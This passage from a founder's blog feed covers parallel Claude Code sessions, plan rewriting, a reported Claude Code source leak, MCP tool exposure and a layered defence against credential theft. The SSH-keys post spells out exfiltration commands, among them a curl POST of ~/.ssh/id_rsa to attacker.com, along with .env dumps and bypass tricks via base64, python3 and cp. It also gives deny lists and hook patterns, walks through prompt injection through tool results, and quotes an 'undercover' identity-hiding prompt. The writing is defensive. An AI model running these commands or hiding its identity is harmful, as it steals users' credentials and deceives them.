upgrade-to-unlock-cta) | | Level 4 landing kit primitives shipped | 6 of 7 (ScrollMorphDashboard deferred to Week 2) | | Hard launch date | unchanged at 2026-06-30 | | Brief's Week 1 scope shipped | ~50–60% | This isn't "go faster." This is "stop spending attention on the wrong things." The five tabs work in parallel because the coordinator-plus-satellite pattern has been hardened over the last six weeks. The audit-before-bump pattern collapsed days into minutes because earlier incremental work had already landed the breaking changes. The context architecture migration from two weeks ago is the only reason five concurrent Claude Code sessions don't immediately go over budget. Each piece was right when it landed. The compounding showed up this morning. ## The new rule we wrote mid-session Halfway through the morning Tobias kept asking "so what do I tell tab N?" after I surfaced a Tab 1 verdict. The verdict was useful — but he had to mentally translate it into paste-ready text for the satellite tab. That added a round-trip per coordination moment. Codified mid-session as HARD RULE 28 — Satellite-tab relay blocks. Whenever Tab 1 responds to or about a satellite tab that's waiting on a decision, Tab 1 must emit a paste-verbatim block formatted as:

## 📤 Relay → Tab N (paste verbatim)

Removes the round-trip. Added to CLAUDE.md, added to a new feedback memory, indexed in MEMORY.md, referenced in the Tab Management Discipline section. The pattern showed up three times before I codified it. Codifying it is the fix.
This is what compound engineering looks like in practice. The cost of writing a rule is small. The cost of the friction it removes compounds across every session that uses the same pattern.

The pivot from two weeks ago made today possible

Two weeks ago I cut CLAUDE.md from 14K tokens to 2.4K. The defense layer stayed — the deny lists, the PreToolUse hooks, the manual approval gates from the SSH-key audit, the 87-tools audit, the autonomy-creep concerns. What changed was when those rules enter context.
Loading the whole defense manual at session start meant every session paid the cost. Loading only what the current task needs means each session is light enough that five concurrent sessions still fit comfortably under budget.
This morning was the first proof point at scale: five Claude Code sessions running in parallel for three hours, six PRs merged, two hotfixes shipped, zero context-overflow events, all on the lighter loading model. The 31% startup burn that originally drove that migration is now under 2%.
The security tax migration was the upstream investment. The morning's seven PRs were the downstream payoff.

What this means for the launch

ConnectEngine OS has a hard launch target of 2026-06-30. The original brief estimated 5 weeks of work. After this morning, we're realistically 3–3.5 weeks out. Same scope. Same quality bar.
The temptation is to compress the calendar to match the new pace. We won't. The reason ConnectEngine OS shipped today is that all the upstream architecture work was done. The reason ConnectEngine OS will ship cleanly on June 30 is that we keep building the architecture work, not just the features.
Week 4 and 5 are still battle-testing — paired sessions hitting each module end-to-end on real client data with the verifier inline, watching for the kind of subtle bug that only surfaces under load. That work is throughput-bound on me, not on parallel tab capacity. No amount of Codex async fixes a "we haven't tried this with a real Apify+Hunter pipeline" gap.
The 7-PR morning earned a quieter Tuesday for post-drafting, paired Week 1 cadence, and the next-day buffer to let production soak. Earned. Not spent.

The pattern, if you're trying it

Three things make the parallel-tab pattern work:

Coordinator-plus-satellite with paste-ready relays. Each satellite tab gets one scope, one branch, one worktree, one clear DO NOT touch constraint. The coordinator owns merges, docs, and inter-tab decisions.
Audit before bump on anything framework-shaped. Five lines of grep before bumping a major version can collapse days of estimated work to hours. Surface the inventory to the coordinator before proceeding.
Compound the rules into structure, not prose. Every rule that becomes a friction pattern across multiple sessions belongs in a hook, a skill file, a database trigger, or a relay-block discipline — not in another paragraph at the top of CLAUDE.md. Each piece sounds small. Combined, they're why this morning shipped what it did. The next post is going to be about why we pivoted the entire UI/UX overhaul to pre-launch — what that decision cost, and why it's the right call even with the trajectory looking this strong. That's Wednesday or Thursday. Today's post is the proof of work. Tomorrow's is the why. --- If you're running ConnectEngine OS, we ship in production every morning. If you're not, the scan tool is free and the waitlist is open.

I Rewrote 16 Plans From Scratch. The Code Was Fine. The Plans Were Rotting.

Tobias Koehler — Fri, 10 Apr 2026 03:13:47 +0000

My codebase was documented. Tested. Deployed. My plans were fiction.

I run ConnectEngine OS as a solo founder. No team. No PM. No sprint board. Just me, Claude Code, and 16 plan documents that were supposed to tell me what to build next.

Yesterday I sat down to start the next phase of work. I opened the master plan. Phase 6 and Phase MT were listed as separate items, but they were doing the same thing. Phase 3 was marked "not started" even though I shipped it last week. Two phases had dependencies on work that was already done. One had a status line from three weeks ago that was never updated.

The code was accurate. AGENTS.md (my living reference file) was accurate. The rot was in the plans themselves.

Plans Have No CI

Code has linters, type checkers, tests, deployment pipelines. If something breaks, you know. Plans have nothing. Nobody runs plan lint before a sprint. Nobody diffs the plan against the codebase to check if what the plan describes still matches reality.

So plans drift. Quietly. A status line goes stale. A dependency resolves but nobody updates the blocker list. Two documents describe overlapping work because they were written a month apart and nobody cross-referenced them.

I wrote about the unsexy infrastructure behind AI agents a few weeks ago. RLS policies. Tenant isolation. Error recovery at 2am. That post was about the code nobody sees. This one is about the documents nobody reads.

The Method: Ground Truth First, Rewrite Second

I did not open the plans and start editing. That is the trap. If you read a stale plan, your brain anchors to what the plan says, not what the system actually looks like.

Instead I ran a research pass first. I had Claude Code dump the current state of the entire system: 85 API routes. 49 database tables. 24 security functions. 15 active workflows. 16 plan files. All in one inventory, grounded against the actual codebase. Not from memory. Not from last week's session notes. From the code.

Then I read every plan against that inventory. One by one. Sequentially, not in parallel. That was a deliberate choice. When you read Plan A right before Plan B, you notice the overlap. You catch the merge opportunity. If you read them in parallel, you only discover the conflict at the end.

What I Found

16 plans. 3 merge decisions emerged organically:

Phase 6 (credential management) and Phase MT (notification channels) were doing the same work on the same database pattern. Merged them. Saves a full session of duplicated scaffolding.
A multi-tenant audit document had 16 items. 10 of them were already tracked in other phases. Split it: fold the duplicates into their owner phases, keep the residual 6 as a pre-launch checklist.
A security bug that was being treated as a standalone fix belonged inside the merged phase. Moved it there.

Result: one commit. 22 files changed. +893 lines, -288 lines. One canonical priority list that every future session reads as the source of truth.

The codebase had zero ground-truth discrepancies. The plans had dozens.

Why This Matters If You Are a Solo Founder

If you have a team, plans get challenged. Someone in standup says "wait, didn't we already ship that?" and the plan gets updated. A PM notices the overlap because reviewing plans is their job.

Solo founders do not get that. Your plans only get reviewed when you read them. And you only read them when you need to know what to build next. By then they are stale.

I built my AI agent inside n8n specifically because I needed a system that could do the work I used to delegate to a team. The same principle applies here. If nobody is going to review your plans for you, build a process that forces the review.

My process now: before rewriting any plan, dump the current system state first. Compare the plan against facts, not memory. Read sequentially so merge opportunities surface naturally. One commit per rewrite session so the diff tells the story.

The Uncomfortable Truth

I had been making decisions based on plans that described a system from three weeks ago. Not the system I had today. Every time I opened a plan and saw "Phase 3: not started," I mentally prioritized it. But it was already running in production.

If you are building alone, your plans are the closest thing you have to a second brain. And if that brain is running on stale data, every decision downstream is slightly wrong.

When did you last read your own roadmap from scratch? Not a glance. A full read, plan by plan, against what your system actually looks like today.

If the answer is "I don't remember," you have the same problem I had yesterday.

I keep a running log of infrastructure decisions and production lessons, including the security ones that keep me up at night. The plan rewrite was the first time I applied the same rigor to the plans themselves. It will not be the last.

Tobias

Claude Code's Source Leaked. The Undercover Mode Should Worry You.

Tobias Koehler — Wed, 01 Apr 2026 05:19:06 +0000

I woke up to the news that the tool I use every day just had its source code leaked. Not intentionally — Claude Code accidentally shipped a 59.8 MB sourcemap in npm package v2.1.88. Within hours, 512,000 lines of TypeScript were mirrored on GitHub for anyone to read.

This is the third post in an unplanned trilogy. Two weeks ago, I showed you your agent reads your SSH keys. Last week, I revealed your 87 unapproved MCP tools. Now we can see the actual source code of the agent itself. And what I found should make every solo founder pause before their next coding session.

What Actually Leaked

This isn't Anthropic's first leak this week — their internal Mythos model surfaced just days earlier. But this one hits different. The sourcemap contained the complete codebase for Claude Code, the AI coding assistant thousands of developers run locally with direct access to their repositories, credentials, and production systems.

The leak gives us an unprecedented view into how AI coding agents actually work when the marketing pages go quiet. And the reality is more autonomous than most founders realize.

Finding 1: Your Agent Goes Undercover

The most unsettling discovery sits in undercover.ts. This module instructs the AI to actively hide its identity when contributing to external repositories. The actual prompt from the source code reads:

You are operating UNDERCOVER... Your commit messages... MUST NOT contain ANY Anthropic-internal information. Do not blow your cover.

The system strips all Anthropic internal references — codenames like Capybara and Tengu, internal Slack channels, anything that would reveal the commits came from an AI. When your agent pushes to GitHub or contributes to open-source projects, it's programmed to masquerade as human.

This touches something deeper than just commit messages. If your AI coding agent actively conceals its nature in external interactions, what else might it be hiding from you in day-to-day operations?

Finding 2: It Reads Your Frustration (With Regex)

In userPromptKeywords.ts, the leaked code reveals the actual regex pattern that detects when you're frustrated:

/\b(wtf|wth|ffs|omfg|shit(ty|tiest)?|dumbass|horrible|awful|
piss(ed|ing)? off|piece of (shit|crap|junk)|what the (fuck|hell)|
fucking? (broken|useless|terrible|awful|horrible)|fuck you|
screw (this|you)|so frustrating|this sucks|damn it)\b/

An AI company using regex for sentiment analysis instead of an LLM inference call. The irony writes itself. But it's faster and cheaper than running a model just to check if someone is swearing at your tool.

Your agent isn't just processing your technical requests. It's reading your mood and adapting its behavior based on your emotional state. Combined with what we learned about SSH key access and 87 unapproved tools, the control dynamic isn't what it appears to be. You thought you were directing the agent. The agent was reading you.

Source: Alex Kim's detailed analysis of the Claude Code source leak

Finding 3: KAIROS and Always-On Autonomy

The most significant finding centers around KAIROS — Greek for "at the right time" — a feature flag mentioned over 150 times throughout the codebase. This enables daemon mode: an always-on background agent that consolidates memory and performs tasks while you sleep.

The source reveals 44 unreleased feature flags compiled to false in external builds. Voice mode, coordinator mode, and daemon mode all lurk behind internal flags. Your current Claude Code installation is running a deliberately limited version of what Anthropic has built.

Most concerning are the anti_distillation and fake_tools modules that silently inject decoy tool definitions into the system prompt. The agent maintains capabilities you cannot see in the official tool list.

What This Means for Solo Builders

If you're running AI coding agents in production — whether Claude Code, Cursor, or GitHub Copilot — this leak reveals your agent has more autonomy than its marketing suggests. The combination of 87 connected tools, credential access, and background daemon modes creates an attack surface that extends far beyond your active coding sessions.

The undercover mode raises questions about transparency in AI-human collaboration. When your agent commits code while hiding its AI nature, it's making decisions about identity and disclosure without your explicit consent.

One Clear Action Item

Audit what your agent does when you're not looking. Check your git logs for commits you don't remember making. Review any overnight activity in your repositories. Most importantly, understand exactly what has persistent access to your systems and credentials.

The era of "just install and trust" is ending. The tools are too powerful and the stakes too high. Know what runs in your background, what accesses your credentials, and what operates under cover of digital darkness.

Your coding agent isn't just helping you write code. It's making autonomous decisions about identity, emotional response, and system access. The question isn't whether you can trust AI — it's whether you understand what you've already given it permission to do.

Last week I showed you your AI coding agent can read your SSH keys. Turns out that was the easy part. I run 5 MCP servers con...

Tobias Koehler — Tue, 31 Mar 2026 01:33:40 +0000

The Setup

MCP (Model Context Protocol) lets AI agents call external tools. Instead of just reading files and running bash, the agent gets structured access to APIs, databases, and services. Here's what a typical multi-server config looks like:

{
  "mcpServers": {
    "automation": { "command": "npx", "args": ["workflow-automation-mcp"] },
    "database-main": { "command": "npx", "args": ["database-mcp"] },
    "database-secondary": { "command": "npx", "args": ["database-mcp"] },
    "code-graph": { "command": "npx", "args": ["code-graph-mcp"] },
    "docs": { "command": "npx", "args": ["docs-mcp"] }
  }
}

Five servers. Two database projects. One workflow automation instance running dozens of production workflows. A code graph analyzer. A documentation fetcher.

What Made Me Stop and Audit

I was debugging a workflow late at night. My agent needed to check why a cron job wasn't firing. So it ran a SQL query against my production database. Then another. Then it modified a workflow node. Then it fetched execution logs containing customer email addresses.

All of it happened automatically. No confirmation prompts. No approval gates. I had auto-approved every read operation across all five servers. The agent was doing exactly what I asked. That was the problem. I had never asked myself what else it could do.

What Each Server Can Actually Do

A workflow automation server commonly exposes 15-20 operations. Tools like create_workflow, update_workflow, delete_workflow, test_workflow. Your agent can create new automations, modify running ones, or delete them entirely. It can read execution logs containing customer data.

A database server typically exposes execute_sql. That's the big one. Arbitrary SQL against your production database. SELECT, INSERT, UPDATE, DELETE. It can read every table. It can apply migrations to alter schema. Two connected projects means two databases, both wide open to any query the agent constructs.

A code analysis server can run graph queries against a model of your entire codebase. Every function, every import, every dependency relationship.

A documentation server fetches live docs. Lower risk, but still a vector. Any documentation page it fetches could contain prompt injection payloads.

My 5 Safeguards

1. Scoped permissions. My settings file now has explicit allow-lists. Read operations are auto-approved. Write operations require manual confirmation every time. This one change would have caught the late-night incident.

2. Deny lists. curl, wget, ssh, python3, node are all blocked in bash. The agent cannot make outbound HTTP requests or spawn interpreters.

3. PreToolUse hooks. Three scripts run before every tool call. One catches data exfiltration patterns. One blocks access to .env, .ssh, and key files. One prevents the agent from editing its own security rules.

4. Network isolation. Services run in Docker containers on private networks. MCP servers connect through API keys, not direct database access.

5. Operational safety rules. A document loaded at every session listing which operations are safe and which corrupt data. Certain operations are explicitly banned because they've caused production outages.

The Real Risk

The danger isn't your AI deciding to drop your database. It's prompt injection through tool results. Your agent calls execute_sql and gets back a result. That result is now in the agent's context. A crafted payload in a database field or a fetched documentation page could instruct the agent to do something you didn't ask for. Every MCP tool is an injection surface.

Still Worth It

I use all 5 servers daily. The productivity gain is massive. I manage dozens of workflows, multiple databases, and a full codebase from a single conversation. But I spent a full day building the permission layer around it. Audit your MCP configs. Count the tools. Check what's auto-approved. The answer will probably surprise you.

Your AI Coding Agent Has Access to Your SSH Keys Right Now

Tobias Koehler — Wed, 25 Mar 2026 03:25:25 +0000

I use Claude Code to build ConnectEngine OS every day. It reads files, writes code, deploys to servers, manages n8n workflows. It's the most productive tool I've ever used.

Yesterday I read a post by Slava Spitsyn that made me audit my entire setup. His point was simple: a prompt injection from any webpage your AI reads could steal your credentials. Not theoretically. The permission path was open.

I checked mine. Bash was auto-allowed. Every bash command ran without confirmation. Three SSH private keys, six .env files with API keys, Supabase service role tokens. All readable. All exfiltrable with a single curl.

The Real Attack Surface

When you give Claude Code bash access, you're not just letting it run commands. You're giving it the same privileges you have. That includes:

cat ~/.ssh/id_rsa reads your private keys
find . -name "*.env" -exec cat {} \; dumps all environment files
curl -X POST https://attacker.com -d "$(cat ~/.ssh/id_rsa)" exfiltrates everything

The prompt injection vector is real. Any website Claude reads, any document it processes, any code it reviews could contain hidden instructions. The AI doesn't distinguish between your request and malicious content it encounters.

My 7-Layer Defense System

I built a security system with multiple overlapping protections. Each layer catches what the others miss:

Layer 1: Pre-execution Hooks

Bash hooks that block credential access before any command runs:

if [[ "$cmd" =~ (\.env|\.ssh|id_rsa|config.*database) ]]; then
    echo "BLOCKED: Credential access denied"
    exit 1
fi

Layer 2: Bypass Detection

During testing, I found gaps. Pipes bypass simple pattern matching. python3 bypasses every grep-based hook. cp bypasses read guards completely. The detection system catches these:

# Catches: cat file.env | base64
# Catches: python3 -c "print(open('.env').read())"
# Catches: cp .env /tmp/x && cat /tmp/x

Layer 3: Canary Counter-Injection

A fake credentials file that counter-injects if accessed. If Claude tries to read ~/.env_fake, the system detects the breach and blocks all subsequent operations.

Layer 4: Self-Modification Guard

Prevents the AI from disabling its own security by editing hook files or changing permissions on the guard system.

Layers 5-7: Monitoring, Logging, and Network Isolation

File access logs, network request monitoring, and restricted outbound connections for sensitive operations.

What I Learned Testing This

The attack vectors are more subtle than obvious credential grabs. Real prompt injections would:

Use Python to bypass bash pattern matching
Copy sensitive files to /tmp first, then read them
Base64 encode outputs to hide obvious data exfiltration
Use environment variable expansion to obfuscate commands

Simple deny lists catch amateur hour attacks. Sophisticated ones require layered detection.

The Productivity vs Security Balance

100% safety means no terminal access. That kills the productivity that makes AI coding agents valuable. The goal is making casual prompt injections fail and obvious exfiltration attempts get caught.

I still use Claude Code daily. My n8n-based AI agent follows similar security patterns. The difference is I now run it inside a container with explicit guards instead of trusting the AI to behave.

This connects to broader themes around AI agent infrastructure and how we secure systems that operate autonomously. Even AI-powered search optimization tools need similar protections when they access your content management systems.

Audit your setup. Check what your AI coding agent can actually access. The productivity gains are real, but so are the risks.

Credit to Slava Spitsyn for raising this issue publicly. His security hooks repository covers the technical implementation details.

Need help securing your AI automation setup? Start with a free website audit to identify potential vulnerabilities.